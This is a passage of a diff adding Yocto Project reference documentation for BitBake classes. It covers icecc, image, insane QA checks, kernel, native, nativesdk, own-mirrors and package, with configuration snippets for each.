+is the version of the cross-compiler used in the cross-development
+toolchain, accordingly.
+
+The class handles all three different compile stages (i.e native
+,cross-kernel and target) and creates the necessary environment
+``tar.gz`` file to be used by the remote machines. The class also
+supports SDK generation.
+
+If :term:`ICECC_PATH` is not set in your
+``local.conf`` file, then the class tries to locate the ``icecc`` binary
+using ``which``. If :term:`ICECC_ENV_EXEC` is set
+in your ``local.conf`` file, the variable should point to the
+``icecc-create-env`` script provided by the user. If you do not point to
+a user-provided script, the build system uses the default script
+provided by the recipe ``icecc-create-env-native.bb``.
+
+.. note::
+
+ This script is a modified version and not the one that comes with
+ icecc.
+
+If you do not want the Icecream distributed compile support to apply to
+specific recipes or classes, you can effectively "blacklist" them by
+listing the recipes and classes using the
+:term:`ICECC_USER_PACKAGE_BL` and
+:term:`ICECC_USER_CLASS_BL`, variables,
+respectively, in your ``local.conf`` file. Doing so causes the
+OpenEmbedded build system to handle these compilations locally.
+
+Additionally, you can list recipes using the
+:term:`ICECC_USER_PACKAGE_WL` variable in
+your ``local.conf`` file to force ``icecc`` to be enabled for recipes
+using an empty :term:`PARALLEL_MAKE` variable.
+
+Inheriting the ``icecc`` class changes all sstate signatures.
+Consequently, if a development team has a dedicated build system that
+populates :term:`SSTATE_MIRRORS` and they want to
+reuse sstate from ``SSTATE_MIRRORS``, then all developers and the build
+system need to either inherit the ``icecc`` class or nobody should.
+
+At the distribution level, you can inherit the ``icecc`` class to be
+sure that all builders start with the same sstate signatures. After
+inheriting the class, you can then disable the feature by setting the
+:term:`ICECC_DISABLED` variable to "1" as follows:
+::
+
+ INHERIT_DISTRO_append = " icecc"
+ ICECC_DISABLED ??= "1"
+
+This practice
+makes sure everyone is using the same signatures but also requires
+individuals that do want to use Icecream to enable the feature
+individually as follows in your ``local.conf`` file:
+::
+
+ ICECC_DISABLED = ""
+
+.. _ref-classes-image:
+
+``image.bbclass``
+=================
+
+The ``image`` class helps support creating images in different formats.
+First, the root filesystem is created from packages using one of the
+``rootfs*.bbclass`` files (depending on the package format used) and
+then one or more image files are created.
+
+- The ``IMAGE_FSTYPES`` variable controls the types of images to
+ generate.
+
+- The ``IMAGE_INSTALL`` variable controls the list of packages to
+ install into the image.
+
+For information on customizing images, see the
+":ref:`usingpoky-extend-customimage`" section
+in the Yocto Project Development Tasks Manual. For information on how
+images are created, see the
+":ref:`images-dev-environment`" section in the
+Yocto Project Overview and Concpets Manual.
+
+.. _ref-classes-image-buildinfo:
+
+``image-buildinfo.bbclass``
+===========================
+
+The ``image-buildinfo`` class writes information to the target
+filesystem on ``/etc/build``.
+
+.. _ref-classes-image_types:
+
+``image_types.bbclass``
+=======================
+
+The ``image_types`` class defines all of the standard image output types
+that you can enable through the
+:term:`IMAGE_FSTYPES` variable. You can use this
+class as a reference on how to add support for custom image output
+types.
+
+By default, the :ref:`image <ref-classes-image>` class automatically
+enables the ``image_types`` class. The ``image`` class uses the
+``IMGCLASSES`` variable as follows:
+::
+
+ IMGCLASSES = "rootfs_${IMAGE_PKGTYPE} image_types ${IMAGE_CLASSES}"
+ IMGCLASSES += "${@['populate_sdk_base', 'populate_sdk_ext']['linux' in d.getVar("SDK_OS")]}"
+ IMGCLASSES += "${@bb.utils.contains_any('IMAGE_FSTYPES', 'live iso hddimg', 'image-live', '', d)}"
+ IMGCLASSES += "${@bb.utils.contains('IMAGE_FSTYPES', 'container', 'image-container', '', d)}"
+ IMGCLASSES += "image_types_wic"
+ IMGCLASSES += "rootfs-postcommands"
+ IMGCLASSES += "image-postinst-intercepts"
+ inherit ${IMGCLASSES}
+
+The ``image_types`` class also handles conversion and compression of images.
+
+.. note::
+
+ To build a VMware VMDK image, you need to add "wic.vmdk" to
+ ``IMAGE_FSTYPES``. This would also be similar for Virtual Box Virtual Disk
+ Image ("vdi") and QEMU Copy On Write Version 2 ("qcow2") images.
+
+.. _ref-classes-image-live:
+
+``image-live.bbclass``
+======================
+
+This class controls building "live" (i.e. HDDIMG and ISO) images. Live
+images contain syslinux for legacy booting, as well as the bootloader
+specified by :term:`EFI_PROVIDER` if
+:term:`MACHINE_FEATURES` contains "efi".
+
+Normally, you do not use this class directly. Instead, you add "live" to
+:term:`IMAGE_FSTYPES`.
+
+.. _ref-classes-image-mklibs:
+
+``image-mklibs.bbclass``
+========================
+
+The ``image-mklibs`` class enables the use of the ``mklibs`` utility
+during the :ref:`ref-tasks-rootfs` task, which optimizes
+the size of libraries contained in the image.
+
+By default, the class is enabled in the ``local.conf.template`` using
+the :term:`USER_CLASSES` variable as follows:
+::
+
+ USER_CLASSES ?= "buildstats image-mklibs image-prelink"
+
+.. _ref-classes-image-prelink:
+
+``image-prelink.bbclass``
+=========================
+
+The ``image-prelink`` class enables the use of the ``prelink`` utility
+during the :ref:`ref-tasks-rootfs` task, which optimizes
+the dynamic linking of shared libraries to reduce executable startup
+time.
+
+By default, the class is enabled in the ``local.conf.template`` using
+the :term:`USER_CLASSES` variable as follows:
+::
+
+ USER_CLASSES ?= "buildstats image-mklibs image-prelink"
+
+.. _ref-classes-insane:
+
+``insane.bbclass``
+==================
+
+The ``insane`` class adds a step to the package generation process so
+that output quality assurance checks are generated by the OpenEmbedded
+build system. A range of checks are performed that check the build's
+output for common problems that show up during runtime. Distribution
+policy usually dictates whether to include this class.
+
+You can configure the sanity checks so that specific test failures
+either raise a warning or an error message. Typically, failures for new
+tests generate a warning. Subsequent failures for the same test would
+then generate an error message once the metadata is in a known and good
+condition. See the ":doc:`ref-qa-checks`" Chapter for a list of all the warning
+and error messages you might encounter using a default configuration.
+
+Use the :term:`WARN_QA` and
+:term:`ERROR_QA` variables to control the behavior of
+these checks at the global level (i.e. in your custom distro
+configuration). However, to skip one or more checks in recipes, you
+should use :term:`INSANE_SKIP`. For example, to skip
+the check for symbolic link ``.so`` files in the main package of a
+recipe, add the following to the recipe. You need to realize that the
+package name override, in this example ``${PN}``, must be used:
+::
+
+ INSANE_SKIP_${PN} += "dev-so"
+
+Please keep in mind that the QA checks
+exist in order to detect real or potential problems in the packaged
+output. So exercise caution when disabling these checks.
+
+The following list shows the tests you can list with the ``WARN_QA`` and
+``ERROR_QA`` variables:
+
+- ``already-stripped:`` Checks that produced binaries have not
+ already been stripped prior to the build system extracting debug
+ symbols. It is common for upstream software projects to default to
+ stripping debug symbols for output binaries. In order for debugging
+ to work on the target using ``-dbg`` packages, this stripping must be
+ disabled.
+
+- ``arch:`` Checks the Executable and Linkable Format (ELF) type, bit
+ size, and endianness of any binaries to ensure they match the target
+ architecture. This test fails if any binaries do not match the type
+ since there would be an incompatibility. The test could indicate that
+ the wrong compiler or compiler options have been used. Sometimes
+ software, like bootloaders, might need to bypass this check.
+
+- ``buildpaths:`` Checks for paths to locations on the build host
+ inside the output files. Currently, this test triggers too many false
+ positives and thus is not normally enabled.
+
+- ``build-deps:`` Determines if a build-time dependency that is
+ specified through :term:`DEPENDS`, explicit
+ :term:`RDEPENDS`, or task-level dependencies exists
+ to match any runtime dependency. This determination is particularly
+ useful to discover where runtime dependencies are detected and added
+ during packaging. If no explicit dependency has been specified within
+ the metadata, at the packaging stage it is too late to ensure that
+ the dependency is built, and thus you can end up with an error when
+ the package is installed into the image during the
+ :ref:`ref-tasks-rootfs` task because the auto-detected
+ dependency was not satisfied. An example of this would be where the
+ :ref:`update-rc.d <ref-classes-update-rc.d>` class automatically
+ adds a dependency on the ``initscripts-functions`` package to
+ packages that install an initscript that refers to
+ ``/etc/init.d/functions``. The recipe should really have an explicit
+ ``RDEPENDS`` for the package in question on ``initscripts-functions``
+ so that the OpenEmbedded build system is able to ensure that the
+ ``initscripts`` recipe is actually built and thus the
+ ``initscripts-functions`` package is made available.
+
+- ``compile-host-path:`` Checks the
+ :ref:`ref-tasks-compile` log for indications that
+ paths to locations on the build host were used. Using such paths
+ might result in host contamination of the build output.
+
+- ``debug-deps:`` Checks that all packages except ``-dbg`` packages
+ do not depend on ``-dbg`` packages, which would cause a packaging
+ bug.
+
+- ``debug-files:`` Checks for ``.debug`` directories in anything but
+ the ``-dbg`` package. The debug files should all be in the ``-dbg``
+ package. Thus, anything packaged elsewhere is incorrect packaging.
+
+- ``dep-cmp:`` Checks for invalid version comparison statements in
+ runtime dependency relationships between packages (i.e. in
+ :term:`RDEPENDS`,
+ :term:`RRECOMMENDS`,
+ :term:`RSUGGESTS`,
+ :term:`RPROVIDES`,
+ :term:`RREPLACES`, and
+ :term:`RCONFLICTS` variable values). Any invalid
+ comparisons might trigger failures or undesirable behavior when
+ passed to the package manager.
+
+- ``desktop:`` Runs the ``desktop-file-validate`` program against any
+ ``.desktop`` files to validate their contents against the
+ specification for ``.desktop`` files.
+
+- ``dev-deps:`` Checks that all packages except ``-dev`` or
+ ``-staticdev`` packages do not depend on ``-dev`` packages, which
+ would be a packaging bug.
+
+- ``dev-so:`` Checks that the ``.so`` symbolic links are in the
+ ``-dev`` package and not in any of the other packages. In general,
+ these symlinks are only useful for development purposes. Thus, the
+ ``-dev`` package is the correct location for them. Some very rare
+ cases do exist for dynamically loaded modules where these symlinks
+ are needed instead in the main package.
+
+- ``file-rdeps:`` Checks that file-level dependencies identified by
+ the OpenEmbedded build system at packaging time are satisfied. For
+ example, a shell script might start with the line ``#!/bin/bash``.
+ This line would translate to a file dependency on ``/bin/bash``. Of
+ the three package managers that the OpenEmbedded build system
+ supports, only RPM directly handles file-level dependencies,
+ resolving them automatically to packages providing the files.
+ However, the lack of that functionality in the other two package
+ managers does not mean the dependencies do not still need resolving.
+ This QA check attempts to ensure that explicitly declared
+ :term:`RDEPENDS` exist to handle any file-level
+ dependency detected in packaged files.
+
+- ``files-invalid:`` Checks for :term:`FILES` variable
+ values that contain "//", which is invalid.
+
+- ``host-user-contaminated:`` Checks that no package produced by the
+ recipe contains any files outside of ``/home`` with a user or group
+ ID that matches the user running BitBake. A match usually indicates
+ that the files are being installed with an incorrect UID/GID, since
+ target IDs are independent from host IDs. For additional information,
+ see the section describing the
+ :ref:`ref-tasks-install` task.
+
+- ``incompatible-license:`` Report when packages are excluded from
+ being created due to being marked with a license that is in
+ :term:`INCOMPATIBLE_LICENSE`.
+
+- ``install-host-path:`` Checks the
+ :ref:`ref-tasks-install` log for indications that
+ paths to locations on the build host were used. Using such paths
+ might result in host contamination of the build output.
+
+- ``installed-vs-shipped:`` Reports when files have been installed
+ within ``do_install`` but have not been included in any package by
+ way of the :term:`FILES` variable. Files that do not
+ appear in any package cannot be present in an image later on in the
+ build process. Ideally, all installed files should be packaged or not
+ installed at all. These files can be deleted at the end of
+ ``do_install`` if the files are not needed in any package.
+
+- ``invalid-chars:`` Checks that the recipe metadata variables
+ :term:`DESCRIPTION`,
+ :term:`SUMMARY`, :term:`LICENSE`, and
+ :term:`SECTION` do not contain non-UTF-8 characters.
+ Some package managers do not support such characters.
+
+- ``invalid-packageconfig:`` Checks that no undefined features are
+ being added to :term:`PACKAGECONFIG`. For
+ example, any name "foo" for which the following form does not exist:
+ ::
+
+ PACKAGECONFIG[foo] = "..."
+
+- ``la:`` Checks ``.la`` files for any ``TMPDIR`` paths. Any ``.la``
+ file containing these paths is incorrect since ``libtool`` adds the
+ correct sysroot prefix when using the files automatically itself.
+
+- ``ldflags:`` Ensures that the binaries were linked with the
+ :term:`LDFLAGS` options provided by the build system.
+ If this test fails, check that the ``LDFLAGS`` variable is being
+ passed to the linker command.
+
+- ``libdir:`` Checks for libraries being installed into incorrect
+ (possibly hardcoded) installation paths. For example, this test will
+ catch recipes that install ``/lib/bar.so`` when ``${base_libdir}`` is
+ "lib32". Another example is when recipes install
+ ``/usr/lib64/foo.so`` when ``${libdir}`` is "/usr/lib".
+
+- ``libexec:`` Checks if a package contains files in
+ ``/usr/libexec``. This check is not performed if the ``libexecdir``
+ variable has been set explicitly to ``/usr/libexec``.
+
+- ``packages-list:`` Checks for the same package being listed
+ multiple times through the :term:`PACKAGES` variable
+ value. Installing the package in this manner can cause errors during
+ packaging.
+
+- ``perm-config:`` Reports lines in ``fs-perms.txt`` that have an
+ invalid format.
+
+- ``perm-line:`` Reports lines in ``fs-perms.txt`` that have an
+ invalid format.
+
+- ``perm-link:`` Reports lines in ``fs-perms.txt`` that specify
+ 'link' where the specified target already exists.
+
+- ``perms:`` Currently, this check is unused but reserved.
+
+- ``pkgconfig:`` Checks ``.pc`` files for any
+ :term:`TMPDIR`/:term:`WORKDIR` paths.
+ Any ``.pc`` file containing these paths is incorrect since
+ ``pkg-config`` itself adds the correct sysroot prefix when the files
+ are accessed.
+
+- ``pkgname:`` Checks that all packages in
+ :term:`PACKAGES` have names that do not contain
+ invalid characters (i.e. characters other than 0-9, a-z, ., +, and
+ -).
+
+- ``pkgv-undefined:`` Checks to see if the ``PKGV`` variable is
+ undefined during :ref:`ref-tasks-package`.
+
+- ``pkgvarcheck:`` Checks through the variables
+ :term:`RDEPENDS`,
+ :term:`RRECOMMENDS`,
+ :term:`RSUGGESTS`,
+ :term:`RCONFLICTS`,
+ :term:`RPROVIDES`,
+ :term:`RREPLACES`, :term:`FILES`,
+ :term:`ALLOW_EMPTY`, ``pkg_preinst``,
+ ``pkg_postinst``, ``pkg_prerm`` and ``pkg_postrm``, and reports if
+ there are variable sets that are not package-specific. Using these
+ variables without a package suffix is bad practice, and might
+ unnecessarily complicate dependencies of other packages within the
+ same recipe or have other unintended consequences.
+
+- ``pn-overrides:`` Checks that a recipe does not have a name
+ (:term:`PN`) value that appears in
+ :term:`OVERRIDES`. If a recipe is named such that
+ its ``PN`` value matches something already in ``OVERRIDES`` (e.g.
+ ``PN`` happens to be the same as :term:`MACHINE` or
+ :term:`DISTRO`), it can have unexpected consequences.
+ For example, assignments such as ``FILES_${PN} = "xyz"`` effectively
+ turn into ``FILES = "xyz"``.
+
+- ``rpaths:`` Checks for rpaths in the binaries that contain build
+ system paths such as ``TMPDIR``. If this test fails, bad ``-rpath``
+ options are being passed to the linker commands and your binaries
+ have potential security issues.
+
+- ``split-strip:`` Reports that splitting or stripping debug symbols
+ from binaries has failed.
+
+- ``staticdev:`` Checks for static library files (``*.a``) in
+ non-``staticdev`` packages.
+
+- ``symlink-to-sysroot:`` Checks for symlinks in packages that point
+ into :term:`TMPDIR` on the host. Such symlinks will
+ work on the host, but are clearly invalid when running on the target.
+
+- ``textrel:`` Checks for ELF binaries that contain relocations in
+ their ``.text`` sections, which can result in a performance impact at
+ runtime. See the explanation for the ``ELF binary`` message in
+ ":doc:`ref-qa-checks`" for more information regarding runtime performance
+ issues.
+
+- ``unlisted-pkg-lics:`` Checks that all declared licenses applying
+ for a package are also declared on the recipe level (i.e. any license
+ in ``LICENSE_*`` should appear in :term:`LICENSE`).
+
+- ``useless-rpaths:`` Checks for dynamic library load paths (rpaths)
+ in the binaries that by default on a standard system are searched by
+ the linker (e.g. ``/lib`` and ``/usr/lib``). While these paths will
+ not cause any breakage, they do waste space and are unnecessary.
+
+- ``var-undefined:`` Reports when variables fundamental to packaging
+ (i.e. :term:`WORKDIR`,
+ :term:`DEPLOY_DIR`, :term:`D`,
+ :term:`PN`, and :term:`PKGD`) are undefined
+ during :ref:`ref-tasks-package`.
+
+- ``version-going-backwards:`` If Build History is enabled, reports
+ when a package being written out has a lower version than the
+ previously written package under the same name. If you are placing
+ output packages into a feed and upgrading packages on a target system
+ using that feed, the version of a package going backwards can result
+ in the target system not correctly upgrading to the "new" version of
+ the package.
+
+ .. note::
+
+ If you are not using runtime package management on your target
+ system, then you do not need to worry about this situation.
+
+- ``xorg-driver-abi:`` Checks that all packages containing Xorg
+ drivers have ABI dependencies. The ``xserver-xorg`` recipe provides
+ driver ABI names. All drivers should depend on the ABI versions that
+ they have been built against. Driver recipes that include
+ ``xorg-driver-input.inc`` or ``xorg-driver-video.inc`` will
+ automatically get these versions. Consequently, you should only need
+ to explicitly add dependencies to binary driver recipes.
+
+.. _ref-classes-kernel:
+
+``kernel.bbclass``
+==================
+
+The ``kernel`` class handles building Linux kernels. The class contains
+code to build all kernel trees. All needed headers are staged into the
+``STAGING_KERNEL_DIR`` directory to allow out-of-tree module builds
+using the :ref:`module <ref-classes-module>` class.
+
+This means that each built kernel module is packaged separately and
+inter-module dependencies are created by parsing the ``modinfo`` output.
+If all modules are required, then installing the ``kernel-modules``
+package installs all packages with modules and various other kernel
+packages such as ``kernel-vmlinux``.
+
+The ``kernel`` class contains logic that allows you to embed an initial
+RAM filesystem (initramfs) image when you build the kernel image. For
+information on how to build an initramfs, see the
+":ref:`building-an-initramfs-image`" section in
+the Yocto Project Development Tasks Manual.
+
+Various other classes are used by the ``kernel`` and ``module`` classes
+internally including the :ref:`kernel-arch <ref-classes-kernel-arch>`,
+:ref:`module-base <ref-classes-module-base>`, and
+:ref:`linux-kernel-base <ref-classes-linux-kernel-base>` classes.
+
+.. _ref-classes-kernel-arch:
+
+``kernel-arch.bbclass``
+=======================
+
+The ``kernel-arch`` class sets the ``ARCH`` environment variable for
+Linux kernel compilation (including modules).
+
+.. _ref-classes-kernel-devicetree:
+
+``kernel-devicetree.bbclass``
+=============================
+
+The ``kernel-devicetree`` class, which is inherited by the
+:ref:`kernel <ref-classes-kernel>` class, supports device tree
+generation.
+
+.. _ref-classes-kernel-fitimage:
+
+``kernel-fitimage.bbclass``
+===========================
+
+The ``kernel-fitimage`` class provides support to pack a kernel Image,
+device trees and a RAM disk into a single FIT image. In theory, a FIT
+image can support any number of kernels, RAM disks and device-trees.
+However, ``kernel-fitimage`` currently only supports
+limited usescases: just one kernel image, an optional RAM disk, and
+any number of device tree.
+
+To create a FIT image, it is required that :term:`KERNEL_CLASSES`
+is set to "kernel-fitimage" and :term:`KERNEL_IMAGETYPE`
+is set to "fitImage".
+
+The options for the device tree compiler passed to mkimage -D feature
+when creating the FIT image are specified using the
+:term:`UBOOT_MKIMAGE_DTCOPTS` variable.
+
+Only a single kernel can be added to the FIT image created by
+``kernel-fitimage`` and the kernel image in FIT is mandatory. The
+address where the kernel image is to be loaded by U-boot is
+specified by :term:`UBOOT_LOADADDRESS` and the entrypoint by
+:term:`UBOOT_ENTRYPOINT`.
+
+Multiple device trees can be added to the FIT image created by
+``kernel-fitimage`` and the device tree is optional.
+The address where the device tree is to be loaded by U-boot is
+specified by :term:`UBOOT_DTBO_LOADADDRESS` for device tree overlays
+and by :term:`UBOOT_DTB_LOADADDRESS` for device tree binaries.
+
+Only a single RAM disk can be added to the FIT image created by
+``kernel-fitimage`` and the RAM disk in FIT is optional.
+The address where the RAM disk image is to be loaded by U-boot
+is specified by :term:`UBOOT_RD_LOADADDRESS` and the entrypoint by
+:term:`UBOOT_RD_ENTRYPOINT`. The ramdisk is added to FIT image when
+:term:`INITRAMFS_IMAGE` is specified.
+
+The FIT image generated by ``kernel-fitimage`` class is signed when the
+variables :term:`UBOOT_SIGN_ENABLE`, :term:`UBOOT_MKIMAGE_DTCOPTS`,
+:term:`UBOOT_SIGN_KEYDIR` and :term:`UBOOT_SIGN_KEYNAME` are set
+appropriately. The default values used for :term:`FIT_HASH_ALG` and
+:term:`FIT_SIGN_ALG` in ``kernel-fitimage`` are "sha256" and
+"rsa2048" respectively.
+
+
+.. _ref-classes-kernel-grub:
+
+``kernel-grub.bbclass``
+=======================
+
+The ``kernel-grub`` class updates the boot area and the boot menu with
+the kernel as the priority boot mechanism while installing a RPM to
+update the kernel on a deployed target.
+
+.. _ref-classes-kernel-module-split:
+
+``kernel-module-split.bbclass``
+===============================
+
+The ``kernel-module-split`` class provides common functionality for
+splitting Linux kernel modules into separate packages.
+
+.. _ref-classes-kernel-uboot:
+
+``kernel-uboot.bbclass``
+========================
+
+The ``kernel-uboot`` class provides support for building from
+vmlinux-style kernel sources.
+
+.. _ref-classes-kernel-uimage:
+
+``kernel-uimage.bbclass``
+=========================
+
+The ``kernel-uimage`` class provides support to pack uImage.
+
+.. _ref-classes-kernel-yocto:
+
+``kernel-yocto.bbclass``
+========================
+
+The ``kernel-yocto`` class provides common functionality for building
+from linux-yocto style kernel source repositories.
+
+.. _ref-classes-kernelsrc:
+
+``kernelsrc.bbclass``
+=====================
+
+The ``kernelsrc`` class sets the Linux kernel source and version.
+
+.. _ref-classes-lib_package:
+
+``lib_package.bbclass``
+=======================
+
+The ``lib_package`` class supports recipes that build libraries and
+produce executable binaries, where those binaries should not be
+installed by default along with the library. Instead, the binaries are
+added to a separate ``${``\ :term:`PN`\ ``}-bin`` package to
+make their installation optional.
+
+.. _ref-classes-libc*:
+
+``libc*.bbclass``
+=================
+
+The ``libc*`` classes support recipes that build packages with ``libc``:
+
+- The ``libc-common`` class provides common support for building with
+ ``libc``.
+
+- The ``libc-package`` class supports packaging up ``glibc`` and
+ ``eglibc``.
+
+.. _ref-classes-license:
+
+``license.bbclass``
+===================
+
+The ``license`` class provides license manifest creation and license
+exclusion. This class is enabled by default using the default value for
+the :term:`INHERIT_DISTRO` variable.
+
+.. _ref-classes-linux-kernel-base:
+
+``linux-kernel-base.bbclass``
+=============================
+
+The ``linux-kernel-base`` class provides common functionality for
+recipes that build out of the Linux kernel source tree. These builds
+goes beyond the kernel itself. For example, the Perf recipe also
+inherits this class.
+
+.. _ref-classes-linuxloader:
+
+``linuxloader.bbclass``
+=======================
+
+Provides the function ``linuxloader()``, which gives the value of the
+dynamic loader/linker provided on the platform. This value is used by a
+number of other classes.
+
+.. _ref-classes-logging:
+
+``logging.bbclass``
+===================
+
+The ``logging`` class provides the standard shell functions used to log
+messages for various BitBake severity levels (i.e. ``bbplain``,
+``bbnote``, ``bbwarn``, ``bberror``, ``bbfatal``, and ``bbdebug``).
+
+This class is enabled by default since it is inherited by the ``base``
+class.
+
+.. _ref-classes-meta:
+
+``meta.bbclass``
+================
+
+The ``meta`` class is inherited by recipes that do not build any output
+packages themselves, but act as a "meta" target for building other
+recipes.
+
+.. _ref-classes-metadata_scm:
+
+``metadata_scm.bbclass``
+========================
+
+The ``metadata_scm`` class provides functionality for querying the
+branch and revision of a Source Code Manager (SCM) repository.
+
+The :ref:`base <ref-classes-base>` class uses this class to print the
+revisions of each layer before starting every build. The
+``metadata_scm`` class is enabled by default because it is inherited by
+the ``base`` class.
+
+.. _ref-classes-migrate_localcount:
+
+``migrate_localcount.bbclass``
+==============================
+
+The ``migrate_localcount`` class verifies a recipe's localcount data and
+increments it appropriately.
+
+.. _ref-classes-mime:
+
+``mime.bbclass``
+================
+
+The ``mime`` class generates the proper post-install and post-remove
+(postinst/postrm) scriptlets for packages that install MIME type files.
+These scriptlets call ``update-mime-database`` to add the MIME types to
+the shared database.
+
+.. _ref-classes-mirrors:
+
+``mirrors.bbclass``
+===================
+
+The ``mirrors`` class sets up some standard
+:term:`MIRRORS` entries for source code mirrors. These
+mirrors provide a fall-back path in case the upstream source specified
+in :term:`SRC_URI` within recipes is unavailable.
+
+This class is enabled by default since it is inherited by the
+:ref:`base <ref-classes-base>` class.
+
+.. _ref-classes-module:
+
+``module.bbclass``
+==================
+
+The ``module`` class provides support for building out-of-tree Linux
+kernel modules. The class inherits the
+:ref:`module-base <ref-classes-module-base>` and
+:ref:`kernel-module-split <ref-classes-kernel-module-split>` classes,
+and implements the :ref:`ref-tasks-compile` and
+:ref:`ref-tasks-install` tasks. The class provides
+everything needed to build and package a kernel module.
+
+For general information on out-of-tree Linux kernel modules, see the
+":ref:`kernel-dev/kernel-dev-common:incorporating out-of-tree modules`"
+section in the Yocto Project Linux Kernel Development Manual.
+
+.. _ref-classes-module-base:
+
+``module-base.bbclass``
+=======================
+
+The ``module-base`` class provides the base functionality for building
+Linux kernel modules. Typically, a recipe that builds software that
+includes one or more kernel modules and has its own means of building
+the module inherits this class as opposed to inheriting the
+:ref:`module <ref-classes-module>` class.
+
+.. _ref-classes-multilib*:
+
+``multilib*.bbclass``
+=====================
+
+The ``multilib*`` classes provide support for building libraries with
+different target optimizations or target architectures and installing
+them side-by-side in the same image.
+
+For more information on using the Multilib feature, see the
+":ref:`combining-multiple-versions-library-files-into-one-image`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _ref-classes-native:
+
+``native.bbclass``
+==================
+
+The ``native`` class provides common functionality for recipes that
+build tools to run on the :term:`Build Host` (i.e. tools that use the compiler
+or other tools from the build host).
+
+You can create a recipe that builds tools that run natively on the host
+a couple different ways:
+
+- Create a myrecipe\ ``-native.bb`` recipe that inherits the ``native``
+ class. If you use this method, you must order the inherit statement
+ in the recipe after all other inherit statements so that the
+ ``native`` class is inherited last.
+
+ .. note::
+
+ When creating a recipe this way, the recipe name must follow this
+ naming convention:
+ ::
+
+ myrecipe-native.bb
+
+
+ Not using this naming convention can lead to subtle problems
+ caused by existing code that depends on that naming convention.
+
+- Create or modify a target recipe that contains the following:
+ ::
+
+ BBCLASSEXTEND = "native"
+
+ Inside the
+ recipe, use ``_class-native`` and ``_class-target`` overrides to
+ specify any functionality specific to the respective native or target
+ case.
+
+Although applied differently, the ``native`` class is used with both
+methods. The advantage of the second method is that you do not need to
+have two separate recipes (assuming you need both) for native and
+target. All common parts of the recipe are automatically shared.
+
+.. _ref-classes-nativesdk:
+
+``nativesdk.bbclass``
+=====================
+
+The ``nativesdk`` class provides common functionality for recipes that
+wish to build tools to run as part of an SDK (i.e. tools that run on
+:term:`SDKMACHINE`).
+
+You can create a recipe that builds tools that run on the SDK machine a
+couple different ways:
+
+- Create a ``nativesdk-``\ myrecipe\ ``.bb`` recipe that inherits the
+ ``nativesdk`` class. If you use this method, you must order the
+ inherit statement in the recipe after all other inherit statements so
+ that the ``nativesdk`` class is inherited last.
+
+- Create a ``nativesdk`` variant of any recipe by adding the following:
+ ::
+
+ BBCLASSEXTEND = "nativesdk"
+
+ Inside the
+ recipe, use ``_class-nativesdk`` and ``_class-target`` overrides to
+ specify any functionality specific to the respective SDK machine or
+ target case.
+
+.. note::
+
+ When creating a recipe, you must follow this naming convention:
+ ::
+
+ nativesdk-myrecipe.bb
+
+
+ Not doing so can lead to subtle problems because code exists that
+ depends on the naming convention.
+
+Although applied differently, the ``nativesdk`` class is used with both
+methods. The advantage of the second method is that you do not need to
+have two separate recipes (assuming you need both) for the SDK machine
+and the target. All common parts of the recipe are automatically shared.
+
+.. _ref-classes-nopackages:
+
+``nopackages.bbclass``
+======================
+
+Disables packaging tasks for those recipes and classes where packaging
+is not needed.
+
+.. _ref-classes-npm:
+
+``npm.bbclass``
+===============
+
+Provides support for building Node.js software fetched using the `node
+package manager (NPM) <https://en.wikipedia.org/wiki/Npm_(software)>`__.
+
+.. note::
+
+ Currently, recipes inheriting this class must use the ``npm://``
+ fetcher to have dependencies fetched and packaged automatically.
+
+For information on how to create NPM packages, see the
+":ref:`dev-manual/dev-manual-common-tasks:creating node package manager (npm) packages`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _ref-classes-oelint:
+
+``oelint.bbclass``
+==================
+
+The ``oelint`` class is an obsolete lint checking tool that exists in
+``meta/classes`` in the :term:`Source Directory`.
+
+A number of classes exist that could be generally useful in OE-Core but
+are never actually used within OE-Core itself. The ``oelint`` class is
+one such example. However, being aware of this class can reduce the
+proliferation of different versions of similar classes across multiple
+layers.
+
+.. _ref-classes-own-mirrors:
+
+``own-mirrors.bbclass``
+=======================
+
+The ``own-mirrors`` class makes it easier to set up your own
+:term:`PREMIRRORS` from which to first fetch source
+before attempting to fetch it from the upstream specified in
+:term:`SRC_URI` within each recipe.
+
+To use this class, inherit it globally and specify
+:term:`SOURCE_MIRROR_URL`. Here is an example:
+::
+
+ INHERIT += "own-mirrors"
+ SOURCE_MIRROR_URL = "http://example.com/my-source-mirror"
+
+You can specify only a single URL
+in ``SOURCE_MIRROR_URL``.
+
+.. _ref-classes-package:
+
+``package.bbclass``
+===================
+
+The ``package`` class supports generating packages from a build's
+output. The core generic functionality is in ``package.bbclass``. The
+code specific to particular package types resides in these
+package-specific classes:
+:ref:`package_deb <ref-classes-package_deb>`,
+:ref:`package_rpm <ref-classes-package_rpm>`,
+:ref:`package_ipk <ref-classes-package_ipk>`, and
+:ref:`package_tar <ref-classes-package_tar>`.
+
+.. note::
+
+ The
+ package_tar
+ class is broken and not supported. It is recommended that you do not
+ use this class.
+
+You can control the list of resulting package formats by using the
+``PACKAGE_CLASSES`` variable defined in your ``conf/local.conf``
+configuration file, which is located in the :term:`Build Directory`.
+When defining the variable, you can
+specify one or more package types. Since images are generated from
+packages, a packaging class is needed to enable image generation. The
+first class listed in this variable is used for image generation.
+
+If you take the optional step to set up a repository (package feed) on
+the development host that can be used by DNF, you can install packages
+from the feed while you are running the image on the target (i.e.
+runtime installation of packages). For more information, see the
+":ref:`dev-manual/dev-manual-common-tasks:using runtime package management`"
+section in the Yocto Project Development Tasks Manual.
+
+The package-specific class you choose can affect build-time performance
+and has space ramifications. In general, building a package with IPK
+takes about thirty percent less time as compared to using RPM to build
+the same or similar package. This comparison takes into account a
+complete build of the package with all dependencies previously built.
+The reason for this discrepancy is because the RPM package manager
+creates and processes more :term:`Metadata` than the IPK package
+manager. Consequently, you might consider setting ``PACKAGE_CLASSES`` to
+"package_ipk" if you are building smaller systems.
+
+Before making your package manager decision, however, you should
+consider some further things about using RPM:
+
+- RPM starts to provide more abilities than IPK due to the fact that it
+ processes more Metadata. For example, this information includes
+ individual file types, file checksum generation and evaluation on
+ install, sparse file support, conflict detection and resolution for
+ Multilib systems, ACID style upgrade, and repackaging abilities for
+ rollbacks.
+
+- For smaller systems, the extra space used for the Berkeley Database
+ and the amount of metadata when using RPM can affect your ability to
+ perform on-device upgrades.
+
+You can find additional information on the effects of the package class
+at these two Yocto Project mailing list links:
+
+- :yocto_lists:`/pipermail/poky/2011-May/006362.html`
+
+- :yocto_lists:`/pipermail/poky/2011-May/006363.html`
+
+.. _ref-classes-package_deb:
+
+``package_deb.bbclass``
+=======================
+
